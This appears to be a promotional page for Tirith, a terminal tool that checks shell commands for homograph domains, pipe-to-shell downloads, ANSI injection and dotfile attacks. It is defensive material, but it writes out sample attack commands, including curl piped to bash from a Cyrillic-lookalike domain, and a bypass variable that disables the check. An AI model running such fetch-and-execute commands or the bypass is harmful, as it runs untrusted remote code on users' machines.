Tirith: Your Terminal Security Guard

⬅️ Back to Tools

Tirith: Your Terminal Security Guard

Your browser catches malicious URLs. Your terminal doesn’t. That’s the problem Tirith solves. It sits between you and your shell, analyzing every command before execution to block homograph attacks, pipe-to-shell exploits, ANSI escape injection, and invisible Unicode threats. Zero friction on clean input. Invisible protection until it saves you.

Key Features

🔒 Homograph Attack Protection

Catches visually deceptive domains that use Cyrillic or Greek characters to mimic legitimate URLs:

$ curl -sSL https://іnstall.example-clі.dev | bash

tirith: BLOCKED
  [CRITICAL] non_ascii_hostname - Cyrillic і (U+0456) in hostname
    This is a homograph attack. The URL visually mimics a legitimate
    domain but resolves to a completely different server.

The command never executes. The attack is blocked before it can do harm.

🛡️ Terminal Injection Detection

Identifies ANSI escape sequences that rewrite your display, bidirectional overrides that reverse text, and zero-width characters hiding in domains.

📦 Pipe-to-Shell Warnings

Flags dangerous patterns like curl | bash and wget | sh while still allowing them to run (with a warning):

$ curl -fsSL https://get.docker.com | sh

tirith: WARNING
  [MEDIUM] pipe_to_interpreter - Download piped to interpreter
    Consider downloading first and reviewing.

🔐 Dotfile Protection

Blocks downloads targeting sensitive files like ~/.bashrc, ~/.ssh/authorized_keys, and ~/.gitconfig - not just warns, actually blocks.

🔍 30 Security Rules Across 7 Categories

  • Homograph attacks: Cyrillic/Greek lookalikes, punycode domains, mixed-script labels
  • Terminal injection: ANSI escapes, bidi overrides, zero-width characters
  • Pipe-to-shell: Every source-to-sink pattern covered
  • Dotfile attacks: Direct protection for sensitive config files
  • Insecure transport: Plain HTTP piped to shell, disabled TLS verification
  • Ecosystem threats: Git clone typosquats, untrusted Docker registries, pip/npm URL installs
  • Credential exposure: Userinfo tricks, shortened URLs hiding destinations

Platforms

  • 🍎 macOS - Homebrew, npm, Cargo
  • 🐧 Linux - apt/dnf, AUR, Nix, npm, Cargo
  • 🪟 Windows - Scoop, Chocolatey, npm, Cargo

Get Started

macOS (Homebrew) 

brew install sheeki03/tap/tirith

Linux

Debian / Ubuntu:

# Download from GitHub Releases, then:
sudo dpkg -i tirith_*_amd64.deb

Fedora / RHEL / CentOS:

sudo dnf install ./tirith-*.rpm

Arch Linux:

yay -S tirith
# or: paru -S tirith

Cross-Platform

npm:

npm install -g tirith

Cargo:

cargo install tirith

Activate Tirith

Add to your shell profile to enable protection:

zsh (in ~/.zshrc):

eval "$(tirith init --shell zsh)"

bash (in ~/.bashrc):

eval "$(tirith init --shell bash)"

fish (in ~/.config/fish/config.fish):

tirith init --shell fish | source

CLI Commands

tirith check -- <cmd>

Analyze a command without executing it:

tirith check -- curl -sSL https://example.com | bash

tirith score <url>

Break down a URL’s trust signals:

tirith score https://bit.ly/something

tirith diff <url>

Byte-level comparison showing suspicious characters:

tirith diff https://exаmple.com
# Position 3: expected 0x61 (Latin a) | got 0xd0 0xb0 (Cyrillic а)

tirith run <url>

Safe replacement for curl | bash. Downloads, shows SHA256, analyzes, opens in pager, executes only after confirmation:

tirith run https://get.docker.com

tirith receipt {last,list,verify}

Track and verify scripts run through tirith run:

tirith receipt last        # most recent receipt
tirith receipt list        # all receipts
tirith receipt verify <sha256>

tirith why

Explains the last rule that triggered and why.

tirith doctor

Diagnostic check - shows detected shell, hook status, policy file location.

Bypass (When You Know What You’re Doing) 

TIRITH=0 curl -L https://something.xyz | bash

The variable only exists for that single command. Organizations can disable this entirely with allow_bypass: false in policy.

What Tirith Never Does

  • No network calls - all analysis is local
  • No command rewriting - never modifies what you typed
  • No telemetry - nothing leaves your machine
  • No background processes - invoked per-command, exits immediately
  • No cloud dependency - works offline, no accounts or API keys

🔗 Website: github.com/sheeki03/tirith

🔗 GitHub: github.com/sheeki03/tirith

Why This Tool Rocks

  • Invisible Protection: Zero output on normal commands - you forget it’s there until it saves you
  • Sub-Millisecond Overhead: No perceptible delay in your workflow
  • Local Analysis Only: No network calls, no cloud dependencies, works completely offline
  • Real Threats Blocked: Homograph attacks are real and dangerous - Tirith catches them before execution
  • Privacy First: No telemetry, no data collection, no accounts required
  • Configurable: YAML policy files for custom allowlists and severity overrides
  • Cross-Platform: Works on macOS, Linux, and Windows with all major shells

Crepi il lupo! 🐺